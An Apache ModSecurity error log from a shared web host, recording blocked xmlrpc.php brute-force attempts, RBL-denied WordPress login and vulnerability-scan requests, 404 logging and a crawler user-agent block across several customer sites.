[Tue May 26 19:27:57.187750 2026] [security2:error] [pid 49598:tid 49776] [client 4.241.228.159:2367] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/166.php"] [unique_id "ahWm5ezJzkdc0WtdrwtasgAAALU"]
[Tue May 26 19:27:57.698583 2026] [security2:error] [pid 49598:tid 49774] [client 91.245.236.124:52639] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm5ezJzkdc0WtdrwtawAAAALM"]
[Tue May 26 19:27:57.698730 2026] [security2:error] [pid 49598:tid 49774] [client 91.245.236.124:52639] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm5ezJzkdc0WtdrwtawAAAALM"]
[Tue May 26 19:27:58.479516 2026] [security2:error] [pid 49598:tid 49757] [client 91.245.236.124:11189] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm5uzJzkdc0Wtdrwta2QAAAKI"]
[Tue May 26 19:27:58.479673 2026] [security2:error] [pid 49598:tid 49757] [client 91.245.236.124:11189] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm5uzJzkdc0Wtdrwta2QAAAKI"]
[Tue May 26 19:27:58.815902 2026] [security2:error] [pid 49598:tid 49747] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm5uzJzkdc0Wtdrwta0QAAAJg"]
[Tue May 26 19:27:58.824059 2026] [security2:error] [pid 49598:tid 49824] [client 104.28.157.147:10309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.157.28.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "adityacreations.co.in"] [uri "/wp-login.php"] [unique_id "ahWm5uzJzkdc0Wtdrwta4wAAAOU"]
[Tue May 26 19:27:59.035684 2026] [security2:error] [pid 49598:tid 49782] [client 202.76.174.144:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm5uzJzkdc0Wtdrwta4gAAALs"]
[Tue May 26 19:27:59.244128 2026] [security2:error] [pid 49598:tid 49770] [client 91.245.236.124:64279] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm5-zJzkdc0Wtdrwta8gAAAK8"]
[Tue May 26 19:27:59.244279 2026] [security2:error] [pid 49598:tid 49770] [client 91.245.236.124:64279] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm5-zJzkdc0Wtdrwta8gAAAK8"]
[Tue May 26 19:27:59.828386 2026] [security2:error] [pid 49598:tid 49775] [client 4.241.228.159:2817] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/wp-mail.php"] [unique_id "ahWm5-zJzkdc0WtdrwtbBgAAALQ"]
[Tue May 26 19:27:59.828486 2026] [security2:error] [pid 49598:tid 49775] [client 4.241.228.159:2817] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/wp-mail.php"] [unique_id "ahWm5-zJzkdc0WtdrwtbBgAAALQ"]
[Tue May 26 19:28:00.023030 2026] [security2:error] [pid 49598:tid 49804] [client 91.245.236.124:39963] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm6OzJzkdc0WtdrwtbCgAAANE"]
[Tue May 26 19:28:00.023155 2026] [security2:error] [pid 49598:tid 49804] [client 91.245.236.124:39963] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm6OzJzkdc0WtdrwtbCgAAANE"]
[Tue May 26 19:28:00.791435 2026] [security2:error] [pid 49598:tid 49799] [client 91.245.236.124:47267] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm6OzJzkdc0WtdrwtbFwAAAMw"]
[Tue May 26 19:28:00.791554 2026] [security2:error] [pid 49598:tid 49799] [client 91.245.236.124:47267] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm6OzJzkdc0WtdrwtbFwAAAMw"]
[Tue May 26 19:28:00.861471 2026] [security2:error] [pid 49598:tid 49607] [remote 31.24.155.180:55512] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.155.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWm6OzJzkdc0WtdrwtbGAAAjAg"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 19:28:01.117742 2026] [security2:error] [pid 49598:tid 49792] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm6OzJzkdc0WtdrwtbFQAAAMU"]
[Tue May 26 19:28:01.585648 2026] [security2:error] [pid 49598:tid 49808] [client 91.245.236.124:39237] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm6ezJzkdc0WtdrwtbOQAAANU"]
[Tue May 26 19:28:01.585751 2026] [security2:error] [pid 49598:tid 49808] [client 91.245.236.124:39237] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm6ezJzkdc0WtdrwtbOQAAANU"]
[Tue May 26 19:28:02.368049 2026] [security2:error] [pid 49598:tid 49747] [client 91.245.236.124:55523] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm6uzJzkdc0WtdrwtbTwAAAJg"]
[Tue May 26 19:28:02.368197 2026] [security2:error] [pid 49598:tid 49747] [client 91.245.236.124:55523] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm6uzJzkdc0WtdrwtbTwAAAJg"]
[Tue May 26 19:28:02.522138 2026] [security2:error] [pid 49598:tid 49744] [client 193.42.56.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWm6uzJzkdc0WtdrwtbTgAAAJU"]
[Tue May 26 19:28:02.564298 2026] [security2:error] [pid 49598:tid 49609] [remote 216.73.216.30:44271] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWm6uzJzkdc0WtdrwtbUAAA8wo"]
[Tue May 26 19:28:02.611140 2026] [security2:error] [pid 49598:tid 49852] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm6uzJzkdc0WtdrwtbSAAAAQE"]
[Tue May 26 19:28:02.713152 2026] [security2:error] [pid 49598:tid 49824] [client 4.241.228.159:2839] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/leaf.php"] [unique_id "ahWm6uzJzkdc0WtdrwtbVAAAAOU"]
[Tue May 26 19:28:02.713260 2026] [security2:error] [pid 49598:tid 49824] [client 4.241.228.159:2839] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/leaf.php"] [unique_id "ahWm6uzJzkdc0WtdrwtbVAAAAOU"]
[Tue May 26 19:28:02.941548 2026] [security2:error] [pid 49598:tid 49723] [remote 114.119.135.57:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.stockmarketanalysis.in"] [uri "/bullion-power-tips.php"] [unique_id "ahWm6uzJzkdc0WtdrwtbXAAApHw"], referer: https://www.stockmarketanalysis.in/services.php
[Tue May 26 19:28:03.140036 2026] [security2:error] [pid 49598:tid 49835] [client 91.245.236.124:15107] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm6-zJzkdc0WtdrwtbXQAAAPA"]
[Tue May 26 19:28:03.140148 2026] [security2:error] [pid 49598:tid 49835] [client 91.245.236.124:15107] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm6-zJzkdc0WtdrwtbXQAAAPA"]
[Tue May 26 19:28:03.928086 2026] [security2:error] [pid 49598:tid 49817] [client 91.245.236.124:64703] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm6-zJzkdc0WtdrwtbcAAAAN4"]
[Tue May 26 19:28:03.928201 2026] [security2:error] [pid 49598:tid 49817] [client 91.245.236.124:64703] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm6-zJzkdc0WtdrwtbcAAAAN4"]
[Tue May 26 19:28:04.714730 2026] [security2:error] [pid 49598:tid 49788] [client 91.245.236.124:11625] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm7OzJzkdc0WtdrwtbfgAAAME"]
[Tue May 26 19:28:04.714854 2026] [security2:error] [pid 49598:tid 49788] [client 91.245.236.124:11625] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm7OzJzkdc0WtdrwtbfgAAAME"]
[Tue May 26 19:28:05.481187 2026] [security2:error] [pid 49598:tid 49810] [client 91.245.236.124:13351] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm7ezJzkdc0WtdrwtbmgAAANc"]
[Tue May 26 19:28:05.481296 2026] [security2:error] [pid 49598:tid 49810] [client 91.245.236.124:13351] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm7ezJzkdc0WtdrwtbmgAAANc"]
[Tue May 26 19:28:05.747509 2026] [security2:error] [pid 49598:tid 49618] [remote 92.205.188.156:55466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahWm7ezJzkdc0WtdrwtboQAAoRM"]
[Tue May 26 19:28:05.846097 2026] [security2:error] [pid 49598:tid 49755] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm7ezJzkdc0WtdrwtbmQAAAKA"]
[Tue May 26 19:28:06.167383 2026] [security2:error] [pid 49598:tid 49637] [remote 136.110.38.51:35710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.38.110.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWm7ezJzkdc0WtdrwtbrgAAnyY"]
[Tue May 26 19:28:06.231061 2026] [security2:error] [pid 49598:tid 49635] [remote 92.205.188.156:55466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.188.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahWm7uzJzkdc0WtdrwtbsgAAwyQ"], referer: https://theafterglow-centre.com/wp-login.php
[Tue May 26 19:28:06.246502 2026] [security2:error] [pid 49598:tid 49733] [client 91.245.236.124:58863] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm7uzJzkdc0WtdrwtbuAAAAIo"]
[Tue May 26 19:28:06.246600 2026] [security2:error] [pid 49598:tid 49733] [client 91.245.236.124:58863] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm7uzJzkdc0WtdrwtbuAAAAIo"]
[Tue May 26 19:28:06.251311 2026] [core:alert] [pid 49598:tid 49788] [client 198.235.24.185:0] /home2/debatqhn/gbogbonise.com/.htaccess: </IfModule> without matching <IfModule> section
[Tue May 26 19:28:06.521944 2026] [security2:error] [pid 49598:tid 49747] [client 4.241.228.159:2824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/grsiuk.php"] [unique_id "ahWm7uzJzkdc0WtdrwtbxAAAAJg"]
[Tue May 26 19:28:06.522077 2026] [security2:error] [pid 49598:tid 49747] [client 4.241.228.159:2824] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/grsiuk.php"] [unique_id "ahWm7uzJzkdc0WtdrwtbxAAAAJg"]
[Tue May 26 19:28:07.010441 2026] [security2:error] [pid 49598:tid 49813] [client 91.245.236.124:62711] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm7-zJzkdc0WtdrwtbywAAANo"]
[Tue May 26 19:28:07.010557 2026] [security2:error] [pid 49598:tid 49813] [client 91.245.236.124:62711] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm7-zJzkdc0WtdrwtbywAAANo"]
[Tue May 26 19:28:07.624854 2026] [security2:error] [pid 49598:tid 49810] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm7-zJzkdc0Wtdrwtb1AAAANc"]
[Tue May 26 19:28:07.778231 2026] [security2:error] [pid 49598:tid 49767] [client 91.245.236.124:47253] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm7-zJzkdc0Wtdrwtb4wAAAKw"]
[Tue May 26 19:28:07.778351 2026] [security2:error] [pid 49598:tid 49767] [client 91.245.236.124:47253] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm7-zJzkdc0Wtdrwtb4wAAAKw"]
[Tue May 26 19:28:08.558783 2026] [security2:error] [pid 49598:tid 49768] [client 91.245.236.124:44133] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm8OzJzkdc0Wtdrwtb9wAAAK0"]
[Tue May 26 19:28:08.558886 2026] [security2:error] [pid 49598:tid 49768] [client 91.245.236.124:44133] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm8OzJzkdc0Wtdrwtb9wAAAK0"]
[Tue May 26 19:28:08.855241 2026] [security2:error] [pid 49598:tid 49628] [remote 72.167.150.128:58596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 128.150.167.72.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWm8OzJzkdc0Wtdrwtb-AAAqR0"]
[Tue May 26 19:28:09.344510 2026] [security2:error] [pid 49598:tid 49807] [client 91.245.236.124:16453] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm8ezJzkdc0WtdrwtcCwAAANQ"]
[Tue May 26 19:28:09.344640 2026] [security2:error] [pid 49598:tid 49807] [client 91.245.236.124:16453] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm8ezJzkdc0WtdrwtcCwAAANQ"]
[Tue May 26 19:28:09.522704 2026] [security2:error] [pid 49598:tid 49623] [remote 82.223.24.195:55466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 195.24.223.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWm8ezJzkdc0WtdrwtcCQAAhhg"]
[Tue May 26 19:28:09.778318 2026] [security2:error] [pid 49598:tid 49786] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm8ezJzkdc0WtdrwtcDQAAAL8"]
[Tue May 26 19:28:10.156697 2026] [security2:error] [pid 49598:tid 49801] [client 91.245.236.124:29335] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm8uzJzkdc0WtdrwtcIAAAAM4"]
[Tue May 26 19:28:10.156822 2026] [security2:error] [pid 49598:tid 49801] [client 91.245.236.124:29335] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm8uzJzkdc0WtdrwtcIAAAAM4"]
[Tue May 26 19:28:10.946137 2026] [security2:error] [pid 49598:tid 49803] [client 91.245.236.124:28889] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm8uzJzkdc0WtdrwtcNgAAANA"]
[Tue May 26 19:28:10.946267 2026] [security2:error] [pid 49598:tid 49803] [client 91.245.236.124:28889] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm8uzJzkdc0WtdrwtcNgAAANA"]
[Tue May 26 19:28:11.719269 2026] [security2:error] [pid 49598:tid 49793] [client 91.245.236.124:34377] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm8-zJzkdc0WtdrwtcUQAAAMY"]
[Tue May 26 19:28:11.719374 2026] [security2:error] [pid 49598:tid 49793] [client 91.245.236.124:34377] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm8-zJzkdc0WtdrwtcUQAAAMY"]
[Tue May 26 19:28:11.910709 2026] [security2:error] [pid 49598:tid 49777] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWm8-zJzkdc0WtdrwtcSAAAALY"]
[Tue May 26 19:28:12.506796 2026] [security2:error] [pid 49598:tid 49776] [client 91.245.236.124:19765] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm9OzJzkdc0WtdrwtcZQAAALU"]
[Tue May 26 19:28:12.506928 2026] [security2:error] [pid 49598:tid 49776] [client 91.245.236.124:19765] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWm9OzJzkdc0WtdrwtcZQAAALU"]
[Tue May 26 19:28:12.574530 2026] [security2:error] [pid 49598:tid 49641] [remote 216.73.216.30:13888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWm9OzJzkdc0WtdrwtcZgAA_yo"]
